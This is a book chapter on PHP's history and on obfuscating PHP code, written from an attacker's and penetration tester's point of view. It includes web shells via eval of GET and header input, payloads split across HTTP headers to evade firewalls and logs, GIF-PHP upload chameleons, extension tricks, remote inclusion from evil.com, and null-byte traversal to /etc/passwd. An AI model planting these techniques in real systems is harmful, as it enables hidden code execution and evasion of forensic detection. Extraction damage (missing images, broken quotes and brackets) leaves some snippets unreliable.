Chapter 6. PHP
Information in this chapter:
• History and Overview
• Obfuscation in PHP
Abstract:
The PHP programming language has a rough history in terms of security and bugs. Therefore, people have been highly critical of the language. For example, a lot of problems were and still are exploitable remotely, and they enable code execution on the affected Web server, stealing information, manipulating data, and interfering with the Web application and runtime's code flow. Often, virtual private server and shared hosting solutions have been targeted by attackers, since attacking the PHP instances on one virtual server instance compromises the entire box, even if the other instances were already secured thoroughly. Also, so-called “security improvements” have been broken and rendered useless regularly. In this chapter, you will learn how PHP developed from a small collection of useful scripts to a powerful object-oriented programming language, as well as how PHP can be used to create obfuscated code. Several features for creating unreadable snippets are also discussed here.
Key words: PHP, Zend Engine, Graphics Interchange Format, Type juggling, Double-quoted string, Heredoc format, Nowdoc format, Single-quoted string, Superglobal, Curly bracket notation
PHP is an interesting programming language with quite a history—from a security point of view as well as in general. Before we start learning how the language can be used to create obfuscated code and discover the features for creating unreadable snippets, let us take a short journey through the language's history and see how it developed from a small collection of useful scripts to a powerful object-oriented programming (OOP) language. To understand this chapter properly you should have some very basic PHP skills.
History and overview
It all began in 1994, when Greenland-based developer, Rasmus Lerdorf, attempted to create and publish a set of scripts that would be useful for generating interactive home pages. Most of those small tools and scripts covered logging tasks to ease the process of generating visitor stats and provide basic counters, and all were written in C and Perl. Sometime later, Lerdorf added a form interpreter and renamed the package from PHP—Personal Homepage to PHP/FI Personal Homepage and Form Interpreter. The first public release of the language occurred in 1995, when Lerdorf added support for database interaction, and the collection of tools became increasingly powerful in terms of helping users create interactive Web applications. At that time, the syntax that was used did not resemble PHP as it exists today, as the following PHP/FI code example illustrates, and in fact used deprecated XML comment syntax:
<!--getenv HTTP_USER_AGENT-->
<!--ifsubstr $exec_result Mozilla-->
Hey, you are using Netscape!<p>
<!--endif-->
In 1997, Zeev Suraski and Andi Gutmans joined Lerdorf and started to rewrite the codebase. The result was PHP/FI 2, which became the foundation for the first release of PHP proper in June 1998, with the major version number 3. At this point, the meaning of the acronym changed from Perl Homepage to PHP: Hypertext Processor. Meanwhile, the language continued to grow, and even became the runtime on which Suraski and Gutmans relied to help them as they created an e-commerce solution they were working on at the time. In addition, the first steps toward OOP integration were taken at this time, with PHP 3 offering plain encapsulation of functions into class constructs.
A byproduct of the 1997 rewrite was a PHP scripting engine called the Zend Engine, and this became the flagship product of the Israel-based company Suraski and Gutmans later formed, called Zend Technologies (the name Zend is a combination of the founders' first names, Zeev and Andi). Over the next few years, PHP managed to gain quite a bit of market share among server-side runtimes for Web applications, and in May 2000, PHP 4 was released. Running on the Zend Engine 1.0, PHP 4 introduced numerous rudimentary OOP features, taking the language one step closer to “real” OOP. Four years later, in 2004, PHP 5 was released, complete with abstract classes, interfaces, and other OOP features, all based on the Zend Engine II. Table 6.1 summarizes this brief history of PHP.
Table 6.1 Major PHP Versions
DateVersionMajor Features
June 19951First official release
November 19972Performance and feature improvements; implemented in C
June 19983First steps toward OOP; stricter and more consistent language syntax; lots of bug fixes and more thorough beta testing
May 20004Another core rewrite; support for HTTP Sessions and superglobals; optimization and bug fixes; more support for Web servers
July 20045Based on Zend Engine II; heavily improved OOP features; namespaces, anonymous classes, and reimplementation of the goto feature main components in PHP 5.3
Forthcoming6Promises unicode support; register_globals, safe_mode, and magic_quotes deprecated
A more detailed overview on the history of PHP and the major improvements is available at http://us2.php.net/manual/en/history.php.php.
At the time of this writing, PHP is at version 5.3.x and PHP 6 is in the works. The language is known as a user-friendly way to create Web applications very quickly, while at the same time providing an array of features, classes, libraries, and extras. There are several repositories for existing classes and toolkits, such as PEAR (PHP Extension and Application Repository), as well as libraries written in C and other languages such as PECL (PHP Extension Community Library). Countless Web sites offer free scripts and packages, and even more Web sites provide tutorials and courses on how to learn PHP and create applications. Needless to say, most of these tutorials focus on applications that work, not on applications that both work and have a decent level of security, which explains why so many PHP-based applications and Web sites are hopelessly insecure and often broken by design.
PHP's rough history in terms of security and bugs has made people highly critical of the language. Some sources1 even state that PHP and security is an oxymoron, and analyzing open vulnerability databases rather supports that contention. A lot of problems were and still are exploitable from remote and enable code execution on the affected Web server, stealing information, manipulating data, and interfering with the Web application's and the runtime's code flow. Often, virtual private server (VPS) and shared hosting solutions have been targeted by attackers, since attacking the PHP instances on one virtual server instance compromises the entire box, even if the other instances were secured thoroughly. Also, so-called “security improvements,” such as magic_quotes and safe_mode, have been broken and rendered useless quite regularly (see http://php.net/manual/en/security.magicquotes.php and http://php.net/manual/en/features.safe-mode.php).
Several projects have been formed to deal with the aforementioned problems. One of the most powerful and popular of these projects is known as Suhosin, which was created by Stefan Esser, an ex-member of the PHP core team. (It is amusing to follow the discussions which led to Esser's exit from the team and his subsequent creation of the Suhosin project, but the language used might not be suitable for the faint of heart.)
So, to avoid getting stuck in the history of PHP and its countless vulnerabilities, let us look at how we can get PHP code running on a Web server. A CLI module is available, but we will not focus on it. Since PHP files are being parsed whenever they are requested, the language is not really the fastest way to deliver interactive content in Web applications. There are numerous approaches to deal with that issue, among them caching engines such as XCache, Alternative PHP Cache (APC), and comparable solutions, as well as interesting projects such as HipHop (HPHP), designed and implemented by the Facebook development team to generate binary files from complete PHP Web applications to drastically increase Web site performance.
Obfuscation in PHP
There are countless ways to execute PHP code as soon as PHP has been installed. One of the most common and easiest-to-use configurations is known as LAMP, which stands for Linux, Apache, MySQL, and PHP.
For the code samples in this chapter, the Apache 2.2.12 server and PHP 5.2.10—2ubuntu6.3 were used primarily. Some of the code examples use the new features introduced in PHP 5.3 (which was not available as a packaged version at the time of this writing). Other code examples in this chapter will work smoothly only when PHP error reporting is switched off, which is usually the case on production servers and live Web sites.
If you do not have a PHP environment in which to run your own PHP obfuscation tests, visit http://codepad.org, which provides a free tool for evaluating arbitrary PHP code.
A lot of other languages are supported as well. For PHP, be sure you enter starting delimiters, such as <?php or <?, to make it work.
For our obfuscation scenario, let us assume the Web server (Apache in our case) receives a request from a client. Depending on the object and file extension the client is asking for, the Web server decides which runtime to use to deliver the requested data. Usually the following file extensions are connected with the PHP runtime:
<IfModule mod_php5.c>
AddType application/x-httpd-php.php.phtml.php3
AddType application/x-httpd-php-source.phps
</IfModule>
You can find that snippet of code connecting file extensions with the runtime in your Web server configuration file or folder, depending on the operating system distribution being used. In the following examples, we will assume our test files are suffixed with a.php extension. In some situations, we will tamper with this extension to show how to smuggle in files with different extensions and have them be parsed and executed by PHP. We saw a very atavistic example of PHP code coming from the dark ages of PHP/FI at the beginning of this chapter. Now let us look at how to execute PHP code inside PHP files we can use today:
<?php echo 'works fine'; ?>
<? echo 'works too—if short_open_tag is enabled (default=On)'; ?>
<% echo 'works—in case asp_tags are being enabled (default=Off)'; %>
<?= ‘oh—it echoes directly!' ?>
<%= ‘same for ASP like tags' %>
As you can see, there are several ways to get PHP code to run. The next snippet shows the portion of the main PHP configuration file, the php.ini file, which is responsible for enabling and disabling those methods of delimiting code:
; Allow the <? tag. Otherwise, only <?php and <script> tags are recognized.
; NOTE: Using short tags should be avoided when developing applications or
; libraries that are meant for redistribution, or deployment on PHP
; servers which are not under your control, because short tags may not
; be supported on the target server. For portable, redistributable code,
; be sure not to use short tags.
short_open_tag = On
; Allow ASP-style <% %> tags.
asp_tags = Off
The <? syntax is nice and short and appreciated by template developers—but causes some trouble for developers used to deal with XML—since the notation is overlapping with the declaration for XML processing instructions—forcing the developer to create a lot of overhead to make sure that XML code is not being parsed as PHP and vice versa.
In the preceding code, the <?= delimiter syntax implies that only echoing of strings and variables is possible. We can quickly disprove that by using a simple ternary operator, turning the entire example into arbitrary code. Next, we will attempt to call the phpinfo() method, which will give us nicely formatted output and tell us about the most important configuration and runtime parameters of the currently installed instance.
A Request for Comments (RFC) from 2008 proposes to enable <?= even if short_open_tag is switched off (see http://wiki.php.net/rfc/shortags).
<?= ‘Just an echo?’ ? eval(‘phpinfo()";’): 0; ?>
Thus far, we have seen how to delimit code inside PHP files, and we learned that the Web server determines the file type based on its extension. Therefore, if a file extension is.php or.php3, or even.phtml, the Web server will delegate the request to the PHP runtime and have it do the dirty work of parsing and processing the requested object. But what if the file extension is not.php, and instead is unknown or is something similar to.php? In this case, the default configuration of Apache 2 tries to walk backward in the filename and figure out what the real extension, and thus the MIME type, could be. This is actually a terrible security problem, since there are many ways to obfuscate the filename and make the Web server think it is a PHP file. Here is a short list of the possible extension obfuscations from which an attacker can choose:
• test.php
• test.php.
• test.php…
• test.php.123
• .php.
• .php…
• php.
• .php…123
Files with these file extensions will automagically be considered PHP files and will be delegated to the PHP runtime. This is a rather useless feature, as rendering those Web applications vulnerable provides uploads yet lacks proper file extension validation. Additionally, on UNIX-based systems, files prefixed with a dot are usually marked as invisible; thus they are not visible in directory listings and unparameterized calls of the console methods dir and ls. Apache also assists in the other direction, allowing us to request files and objects without an explicitly mentioned extension. So, for example, requesting http://localhost/test will automatically deliver http://localhost/test.php, if there's no other file named test or test.html. Therefore, a file called .php.php can be requested with either .php or .php.php.
Of course, it is possible to create chameleon files containing valid Graphics Interchange Format (GIF) image data as well as PHP code. Figure 6.1 shows a basic example of a small GIF-PHP chameleon. If the targeted application accepts uploads and does not validate the extension properly, it is easy to upload such a chameleon and execute arbitrary PHP code on the box afterward. The easiest way to do so is to add some PHP code inside the comments section of the GIF file and rename it to have an extension such as .gif.php or something similar.
B9781597496049000066/f06-01-9781597496049.jpg is missing
Figure 6.1
An infected GIF File shown via the Hex Editor.
Although this problem is neither new nor very sophisticated, it remains unfixed and affects a lot of Web applications in the wild. The output will be:
GIF89aB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingÿÿÿÿÿÿ!þyay!B9781597496049000066/icon01-06-9781597496049.jpg is missing,B9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingB9781597496049000066/icon01-06-9781597496049.jpg is missingDB9781597496049000066/icon01-06-9781597496049.jpg is missing;
Comparable problems exist for other characters embedded in filenames. You can find a good article on this at www.ush.it/2009/02/08/php-filesystem-attack-vectors/.
At this point, you might be able to see where we are heading in this chapter. We have barely started, and already we discovered several ways to mess with PHP and Web servers utilizing PHP. The problem that is connected with these and the following examples is the fact that PHP is extremely powerful and provides a lot of APIs and native functions that allow evaluation of code, inclusion of files to execute their code or unveil their content, and actual delegation of system commands to the targeted server's console via functions such as exec(), shell_exec(), system(), and passthru().
Let us get to the basics of PHP obfuscation, and see how we can solve these and other problems, such as generating numbers, generating strings, and finding ways to mix in code structures and arbitrary characters, to make the code snippet as difficult to find and decode as possible. To start, take a look at the following example:
<?php
$${‘_x’.array().‘_’}=create_function(
‘$a’, ‘retur’.@false.‘n ev'.a.‘l($a);’);$$_x_(‘echo 1;’
);
This snippet is nothing more than a small and obfuscated kick-starter for regular string evaluation. You can easily spot the string to evaluate; it's echo 1;. But the evaluation method itelf is a bit harder to find.
PHP and numerical data types
In PHP obfuscation, numerical values play an important role, just as they do in JavaScript obfuscation. We can use numerical values for a lot of things, including generating huge numbers and converting them to other representations to extract certain characters, or just accessing elements inside an array or even a string. It is also possible to access array elements, but it is not possible to access elements of hash maps, unless the key matches the numerical value accessing it. However, strings count as arrays in terms of accessing their elements. Let us look at an example:
<?php
$a=array(1,2,3,4,5); echo $a[1]; // echoes 2
$a=array(‘1’ => 2, ‘3’ => 4); echo $a[1]; // echoes 2
$a=array(0, 1, ‘1’ => 2, ‘3’ => 4); echo $a[1]; // echoes 2
$a=‘12345’; echo $a[1]; // echoes 2
All four lines of code in the preceding example echo the same value: 2. As you can see, just as in JavaScript, it is not possible to access elements of hash maps in this way. The key ‘1’ is selected in favor of the element with the index 1; otherwise, the output of this script would have been 2212 and not 2222. But how can we create more chaotic-looking numerical values to access array and string elements? PHP provides a lot of possibilities for that purpose.
First, there are a lot of numerical representations that we can choose from. Since PHP is a dynamically typed language, the actual type or format of the numerical value usually does not matter. This often has terrible consequences in terms of application security, because in many situations, an attacker can misuse this fact and cause heavy disturbances in code flow. There is a nice write-up on this so-called type juggling technique in PHP, at http://us3.php.net/manual/en/language.types.type-juggling.php.
If the developer forgot that true can be equivalent to 1, and even to "1" or count(false) and other statements, the consequences can be grave. We will not go into much detail on vulnerabilities such as this, but in the context of obfuscation and circumvention it might be interesting to know that true can be replaced with 1 or "1," or with other statements if the developer was not extra careful.
The following examples show some of the ways to represent numerical data in PHP. The PHP documentation on number formats is paved with warnings—and not without reason, since we can expect a lot of quirky behavior when working with numbers and the same type providing dynamic typing. 2
<?php
$a=‘12345';
echo $a[1]; //2—decimal index
echo $a[000000000000000000000001]; //2—octal index
echo $a[0x00000000000000000000001]; //2—hexdecimal index
echo $a["000000000000000000000001"]; //2
echo $a[1.00001]; //2
echo $a[1e1]; //2
echo $a[true]; //2
echo $a[count(false)]; //2
echo $a[0+1*1/1]; //2
echo $a["1x1abdcefg"]; //2
You can see from this example that the PHP runtime does not care about the actual type when accessing the matching substring. The only important thing here is the actual value. Also, PHP tends to ignore almost arbitrary trailing data; as soon as the numerical value has been parsed, everything else will be ignored, just like in the previous example snippet. However, in addition to using these representations, we can also use the casting functionalities PHP provides. We basically have two ways to do this: we can use functions to do the job and we can use the (datatype) syntax. Let us have a look:
<?php
$a=‘12345’;
echo $a[(int)"1E+1000"]; //2
echo $a[(int)true]; //2
echo $a[(int)!0]; //2
echo $a[(float)"1.11"]; //2
echo $a[intval("1abcdefghijk")]; //2
echo $a[(float)array(0)]; //2
echo $a[(float)(int)(float)(int)' 1x ']; //2
These examples made use of not only casted strings but also casted arrays and Booleans. Also, PHP does not really care about the amount of casting used on a string or other token, as the last example shows. Furthermore, whitespace can be used again for additional obfuscation, and therefore make it more difficult to find out that (float)(int)(float)(int)‘ 1x ' represents nothing more than 1.00.
This method of generating numbers provides a plethora of possibilities. For instance, we can generate numbers by using strings containing numbers, and by casting and calling methods such as intval(). And of course, we can generate 0 and 1 from all functions and methods returning either false or true, or we can generate numerical values—or empty strings and other data types, such as count(false), levenshtein(a,b), rand(0001,00001), and so on. With properly quoted strings, we can even use special characters such as line breaks and tabs for obfuscation, not just the classic whitespace.
<?php
$a = 1; $b = " \r\t \n 2xyz";
echo $a+$b; //3
We can, of course, also use PHP's automatic casting to perform mathematical operations on strings and other objects, or make use of bit-shift and comparison. The possibilities are endless.
<?php
$a=‘12345';
echo $a[""%1.]; //1
echo $a[!""ˆ0x1]; //1
echo $a[""<>!1E1]; //1
echo $a[""<<1.]; //1
Strings
The following sections will shed some light on how strings can be generated in PHP, and what kinds of string delimiters exist. We will learn about what makes double-quoted strings special and how we can use them for obfuscation, as well as what nowdocs and heredocs are and how we can utilize binary strings for extra obfuscation.
Introducing and delimiting strings
PHP features many ways to introduce and create strings. Most of them are known from other programming languages and are listed and explained in the PHP documentation. 3
The most common way to work with strings in PHP is to make use of single or double quotes for delimiting. Both ways work fine, although a double-quoted string is treated differently by PHP than a single-quoted string. Double-quoted strings, for example, can contain escape sequences for special characters such as line breaks or tabs, and even null bytes, so if the developer uses a construct such as "hello\ngoodbye" it will be treated differently than ‘hello\ngoodbye’. The first example will actually contain the newline, while the second version will just show the character sequence backslash and the letter n.
Quite a range of escape sequences can be used, starting with the null byte \0, several kinds of control characters, the carriage return/line feed combination, and whitespace such as \n, \r, \v, and \t. Of course, the escape character can also be escaped, with \\, and to prevent the variable from expanding, we can use \$. It is even possible to make use of octal and hexadecimal entities inside double-quoted strings. The syntax, as you may have guessed, is \[tableindex] or \x[tableindex]. Let us look at some examples:
<?php
echo ‘hello\t\v\f\r\ngoodbye’; //hello\t\v\f\r\ngoodbye
echo "hello\t\v\f\r\ngoodbye"; //hello[CRLF and whitespace]goodbye
echo ‘hello\0goodbye’; // hello\0goodbye
echo "hello\0goodbye"; // hello[NULLBYTE]goodbye
echo ‘h\x65llo\040goodbye’; // h\x65llo\040goodbye
echo "h\x65llo\040goodbye"; // hello goodbye
The same is true for variables embedded inside double-quoted strings. All variables embedded in double-quoted strings will be parsed and (as mentioned in the PHP manual) expanded. That means their content will be joined in the string at the position they were added. This is a nice feature, because it saves some typing work, especially regarding concatenation operators. At the same time, however, it can be dangerous to use. First, let us look at the syntax. Basically, it is just embedding the variables inside the string, as in "hello$a goodbye!." If $a is set to contain an exclamation mark, the result will be hello!goodbye!. There are several variations regarding the syntax we can use here. PHP has an affinity for curly brackets. As we can see, the following examples work too:
<?php
$a = ‘ ’;
echo "hello{$a}goodbye"; // hello goodbye
echo "hello${a}goodbye"; // hello goodbye
echo "hello{${a}}goodbye"; // hello goodbye
This support for delimiting the label of the variable to expand is necessary, since the parser cannot really know where the label ends and the rest of the string begins. Take the construct hello$agoodbye; will it result in $a or $ag or $agood? There is no way to find that out for sure. But there is more we can do inside double-quoted strings. For example, we can access array indexes, as well as members of objects. And since we already know that PHP allows us to access strings like arrays, we can add some more obfuscation spice:
<?php
$a = array(‘ ’);
$b = ‘ ’;
echo "hello{$a[0]}goodbye"; // hello goodbye
echo "hello{$b[0]}goodbye"; // hello goodbye
echo "hello{$b[""<>!1E1]}goodbye"; //hello goodbye
Not only is it possible to access array indexes, play with numerical obfuscation, and access strings inside double-quoted strings, but we can also call functions and object methods:
<?php
$a = ‘ ’;
echo "hello{$a[phpinfo()]}goodbye";
echo "hello{$a[eval($_GET[‘cmd’])]}goodbye";
The first example snippet shows how to call the phpinfo() function. The second one already implements a small shell to evaluate everything coming in from the GET parameter cmd. So, if the script containing this code is called with test.php?cmd=echo%201; the output will be hello goodbye1hello goodbye, showing that the code will be executed before the echo statement is finished. Note that the index 0 of the variable $a is being used too, since the eval call returns nothing, which is equivalent to 0 in PHP.
But PHP allows more ways to work with strings. For example, we can work with strings that are not quoted at all. The following example will throw a notice on configurations where the error reporting is enabled, but it will still work fine:
<?php
$a = ‘def’;
echo abc. $a; // abcdef
Since version 4, PHP has supported the heredoc syntax, and since version 5.3, it has supported quoted heredoc labels and the slightly advanced nowdoc format.
Heredoc and nowdoc are probably best known among command-line programmers, since this method of string encapsulation is supported by the Bourne shell, zsh, Perl, and many other related languages and dialects.
PHP treats strings inside heredoc blocks like double-quoted strings, so escaped character sequences can be used and variable expansion is enabled, as the next examples demonstrate. Also, newlines and other comparable control chars are preserved. Nowdoc does not expand variables, so what heredoc is for double-quoted strings, nowdoc is for single-quoted strings.
<?php
$a = ‘!’;
$b = <<<X
hello goodby$a
X;
echo $b;
// PHP 5.3+ only
$c = <<<‘X’
hello goodbye!
‘X’;
echo $c;
$_ = ‘!’;echo b<<<_µ
h\x65llo{$a[eval($_GET[‘cmd’])]}goodbye$_
_µ;
There is yet another way to introduce and generate a string in PHP that is not as well known as the techniques we already discussed. You may have already spotted it in the preceding snippet. It is the binary string feature, where strings are introduced by the letter b preceding the actual quoting. It looks like this:
$a = b'hello goodbye‘;
echo $a //hello goodbye
This might be particularly interesting to sneak past filter rules and badly written parsers, and can be used with single- and double-quoted strings as well as with heredoc and nowdoc.
<?php
$a = b<<<X
hello goodbye!
X;
echo $a;
As soon as we have generated the string, PHP provides us with a plethora of methods that we can use to add and remove additional encoding and obfuscation. It starts with the entity encoding and decoding we already know, using html_entity_decode() and comparable functions, and ranges from base64_decode() to functions such as str_rot13() performing a ROT13 encoding and shifting the characters by 13 ASCII table indexes, and so on. Of course, PHP also provides methods for getting a character by its table index, as in chr(). The use of chr() will be pretty interesting in PHP 6, since it will support Unicode codepoints as well as characters and codepoints from the ASCII table (see http://php.net/manual/en/function.chr.php).
PHP also provides actual encryption functions, which can be useful in code obfuscation as well. If an attacker finds a way to hide the key for the decryption from the eyes of the forensics specialist trying to analyze the payload afterward, even low encryption quality can be pretty effective and can require hours of work to actually decipher the code. In the next section, we will discuss some of the ways we can do this.
A versatile attacker (be it in a penetration test or a real attack scenario) wants to make sure that both payload and trigger for the attack are hard to find and detect.
One way is to split the payload and spread it over many places the attacker can control.
PHP is perfect for this. Attackers can use the whole range of input channels from HTTP headers, to POST data, external URLs and even temporary files and uploads. Think of an attack where encrypted strings are being used and the key is hidden in the comment section of one of thousands of legitimately uploaded images.
Using superglobals
Since PHP 4, developers have had access to superglobals, which are predefined variables available in the global scope (see www.php.net/manual/en/language.variables.superglobals.php). They are meant to ease access to data embedded in the HTTP GET string or the POST body as well as other data structures provided by the user, the runtime, and the Web server. Table 6.2 lists the currently available set of superglobals and gives a short explanation of each.
Table 6.2 Superglobals in PHP
VariableDescription
$_GETThis superglobal array contains all data that was passed via URL parameters, using a syntax defined in RFC 3986 (http://tools.ietf.org/html/rfc3986)
$_POSTThis array contains all available data from the POST body of a request. Unlike the GET data, this information is usually not being logged
$_COOKIESThis array contains the cookie data properly formatted as an array
$_REQUESTThe request array contains either GET, POST, or cookie data in a merged form. The order of overwriting in case similarly named data is coming in from different channels is given via the PHP configuration variables_order. PHP 5.3 introduced a new equivalent setting called request_order
$_SESSIONThis array contains all data being stored in the session, if it exists. If the application does not use sessions, the array is simply empty
$_SERVERThis array contains environmental information about the runtime and the Web server. Several of its fields can be influenced by the client
$_ENVThis array deprecated $HTTP_ENV_VARS in PHP 4.1.0. Similar to $_SERVER, this array contains environmental information about the runtime and the Web server used. $_ENV is mostly used for command-line PHP
$_FILESThis array contains information about uploaded files, such as the filename, file size, and MIME type. All of these data, including the MIME type, can be controlled by an attacker. In PHP versions earlier than 4.3.0, the $_REQUEST array also contained the $_FILES data
$GLOBALS$GLOBALS is the universal reference to all variables that are available in the global scope. It can be considered to be the father of all superglobals, since it was present in very early versions of PHP. $_GET, for example, can be accessed directly or via $GLOBALS[‘_GET’], as well as the other mentioned superglobals
Superglobals are easy to access. Let us see how to get information on a given _GET variable, assuming we call the test script we use with the _GET parameter a=1:
<?php
echo $_GET[a];
echo $_GET['a'];
echo $HTTP_GET_VARS[‘a’];
echo $GLOBALS[_GET][‘a’];
echo $_REQUEST[x.x.x.xa];
echo $_REQUEST[‘a’.$x];
echo $_SERVER[QUERY_STRING];
echo $_SERVER[REQUEST_URI];
echo $_SERVER[argv][0];
echo $HTTP_SERVER_VARS[argv][0];
For additional payload obfuscation, $_GET can be considered the least useful, since everything coming in via $_GET will be visible in the Web server's logfiles for later analysis. The POST body of a request is, thus, far more interesting, since an attacker can just create a small snippet of code triggering an evaluation while the actual payload is coming from a POST variable. The same is true for several variables in the _SERVER array. Several fields in this array can be modified by the attacker and filled with short triggers or even fragmented data, possibly bypassing either logging mechanisms and Web application firewalls (WAFs) or intrusion detection system implementations. Also, the deprecated equivalents can still be used in modern PHP versions, so not only does $_SERVER contain the environmental and runtime data but so also does $HTTP_SERVER_VARS.
Now let us use JavaScript and the XMLHttpRequest (XHR) object to see an example of how to manipulate field values in the _SERVER array. The following code snippet shows how to craft Ajax requests and attempt to overwrite the necessary fields:
<script>
x=new XMLHttpRequest;
x.open(‘GET’,‘test.php’);
x.setRequestHeader(‘User-Agent’,‘bar’);
x.setRequestHeader(‘Accept’,‘bar’);
x.setRequestHeader(‘Accept-Language’,‘bar’);
x.setRequestHeader(‘Cookie’,‘bar’);
x.send()
</script>
Usually, user agents append the additional cookie data to the existing cookie string, so a little bit of regular expression magic would be necessary to get to the correct set of data. Of course, it is also possible to define and use arbitrary header data and hide the payload, and this is mostly used in situations where a WAF or intrusion detection system needs to be bypassed. Here is an example that illustrates the possible use of superglobals in obfuscation:
echo b<<<_µ
h\x65llo{$a[eval($_SERVER[‘foo’].$_SERVER[‘ACCEPT’])]}goodbye
_µ;
The example shows a very simple use of a fragmented payload coming from one self-defined request header and one request header that was overwritten by the attacking user agent. Even if the attack is noticed after it occurs it will be very hard to determine what the actual payload consisted of.
To obfuscate access to the necessary superglobal array it's possible to cast it into another data type beforehand—for example, to have it be an object of the type stdClass. Any existing object can, of course, also be cast back to be of type array too:
<?php
$_GET=(object)$_GET;
echo $_GET->a;
$_GET=(array)$_GET;
echo $_GET[‘a’];
Unfortunately, casting a complex data type to a simple string will not cause an implicit serialization of the object, but rather will just return the former data type as a string.
One final note regarding the $_SERVER array. The technique of encrypting an attack payload in this way to hide information could be very valuable for an attacker. If an encrypted payload is being submitted via GET or POST and the key to decipher the text is being sent via an HTTP header or some other field the attacker can control, it will be extremely difficult (if not impossible) for the victim to put this information together after detecting the attack.
Mixing in other data types and comments
As with JavaScript and many other languages, PHP allows use of function calls and statements inside string concatenations. This, of course, makes a lot of sense for many real-world situations such as translation tools, templating engines, and other scenarios. But we can also use this feature for obfuscation and make it harder for an investigator to read the code. It is a very basic and simple obfuscation method, but it is nevertheless worth mentioning.
The initial vector we showed in the section “Obfuscation in PHP” used this technique, among others:
<?php
$${‘_x’.array().‘_’}=create_function(
‘$a’, ‘retur’.@false.‘n ev’.a.‘l($a);’);$$_x_(‘echo 1;’
;
Here, we used an empty array and the silenced false to add useless padding to the original payload to decrease its readability. It is also possible to work with functions that actually return data which cannot be used in the payload. A simple exclamation mark before the call renders the entire statement false, thus making it silent in the concatenation process:
<?php
$${‘_x’.array()/**/.‘_’}=#xyz
create_function(
‘$a’, ‘retur’.@false.‘n eva’//
.!htmlentities("hello!")./**/‘l(/**\/*/$a);’);$$_x_(‘echo 1;’
);
The example also contains the three comment styles PHP knows, which is one-line comments introduced by // and # as well as multiline comments delimited by /* and */, often referred to as C-style and Perl-style comments.
Variable variables: The $$ notation
Another technique that is useful in an obfuscation context involves the variable variables PHP supports (see http://php.net/manual/en/language.variables.variable.php). This feature basically enables the developer to create variables with dynamic labels—for example, inside a loop. We used this feature in several of the example snippets, as it is rather well known and quite easy to understand. Here is a short example:
<?php
$a = ‘a';
echo $a; // echoes the letter a
echo [$$a; // also echoes the letter a $$a == $‘a’ == $a
$a = ‘b’;
$b = 1;
echo [$$a; // echoes 1 $$ == $‘b’ == $b
Since this feature does not stop with $$ but can be used with even more chained variable delimiters, it is easy to create code that looks quirky and is very hard to read. The following example illustrates this:
<?php
$$$$$$$$$$$$a = ‘_GET’;
var_dump($$$$a); // NULL
var_dump($$$$a); // ‘_GET’
var_dump($$$$$$a); // the whole _GET array
PHP also enables us to define the variable label in another way: using curly bracket notation.
Curly bracket notation
Curly bracket notation is comparable to the variable variables feature, since it allows us to execute code when forming the label for a variable. There are not many use cases in real-life applications where this feature makes sense, but some structural and design patterns are easier to implement with dynamic variable labels. The feature is easy to explain via the following example, in which we create several variables using curly bracket notation:
<?php
${‘a‘.‘b’} = 1;
echo $ab; // echoes 1
${‘a’.‘b’.count(false)} = 2;
echo $ab1; // echoes 2
${str_repeat(‘ab’,2)} = 3;
echo $abab; // echoes 3
As you can see, almost arbitrary code can be executed inside the curly brackets. And of course, it is also possible to work with comments, newlines, and all the other string-based obfuscation techniques we learned about earlier in this chapter. An interesting fact is that variables declared inside curly brackets will be available in the surrounding scope, not just inside the curly brackets themselves.
<?php
${1?‘‘.include‘evil.php’:0} = 1;
${‘abc’.@eval("\n\n\n\x65cho 1;")} = 2;
${1?‘‘.include’data://text/html,<?php echo 1;?>’:0} = 3;
The only actual limitation that plays a role for us in terms of code obfuscation is that only one statement can be used inside the brackets. It is not possible to terminate a statement with a semicolon and start over with another one. If an attacker does want to execute several statements, a small trick can help in this regard: using the include() or require() functionality and fetching the payload from another file (or from another domain, if the PHP configuration was sloppy), or a data URI. All the content of the file that is included will instantly be executed as expected.
<?php
${1?‘‘.include‘data://text/html,<?php echo 1;?>’:0} = 2;
We will go into more detail regarding data URI inclusions and more ways to use include and require for code obfuscation in the next section, “Evaluating and executing code.” But before we do, here's another way to execute several statements: Just create a string of the payload to execute and feed it into an eval call, again enabling multiple statements between curly brackets:
<?php
${'abc'.eval('echo 1; echo 2;')} = 2;
Evaluating and executing code
There are a lot of ways that strings can be evaluated and executed in PHP. One of the most basic ways is, of course, the classic include, meaning some file at some location that is reachable by the Web server or PHP runtime will be loaded, and all of its contents will be executed as though the file was opened directly by the PHP engine. The basic syntax is easy, and the family of include functions can be called either as a function or as a statement. Depending on the php.ini options, it might be possible to include resources via a URL, although this feature is switched off by default in modern PHP versions. The following snippet shows the php.ini settings responsible for this behavior:
;;;;;;;;;;;;;;;;;;
; Fopen wrappers;
;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off
Let us look at some examples for local file inclusion:
include(‘foo.txt’);
include_once(‘../bar/foo.txt’);
require 'foo.txt';
require_once '../bar/foo.txt';
require_once(‘http://evil.com/something/scary.php’);
The last example snippet represents classic remote code execution. Whatever PHP code is stored on the evil.com domain will be executed on the box that executes the require_once statement. Another bad thing with inclusions is their vulnerability against null bytes in case the php.ini file or the application itself does not provide protection against it. It is easy to end a string used in an include with a null byte. A classic scenario looks like this:
<?php
include ‘templates/’. $_GET[‘file’]. '.tpl'; // file=../../../etc/passwd%00
If the gpc_magic_quotes setting is inactive, the injected null byte will just do its job, cutting the string and actually taking care that /etc/passwd is being included, and not a file with the.tpl extension. If gpc_magic_quotes is switched on, which is the default for most older PHP 5 versions, it can usually be tricked by injecting a very long path and forcing a truncation. Quality resources on attack vectors such as this are available at the following URLs:
It is a good thing that at least allow_url_include is switched off by default, because it opens the door for a lot of interesting ways to include and execute data, as well as obfuscate and smuggle payloads past firewalls and other protective mechanisms. Not only can standard HTTP URLs be used but also file URIs, data URIs, and even the PHP stream handlers can be included in this way. Although file and data URIs are not really new to us, stream handlers are. Let us look at some examples to learn more about this:
<?php
include 'file:///etc/passwd‘;
include ‘data://text/html,<h1>hello!</h1>’;
include ‘php://filter//////////resource=test2.php’;
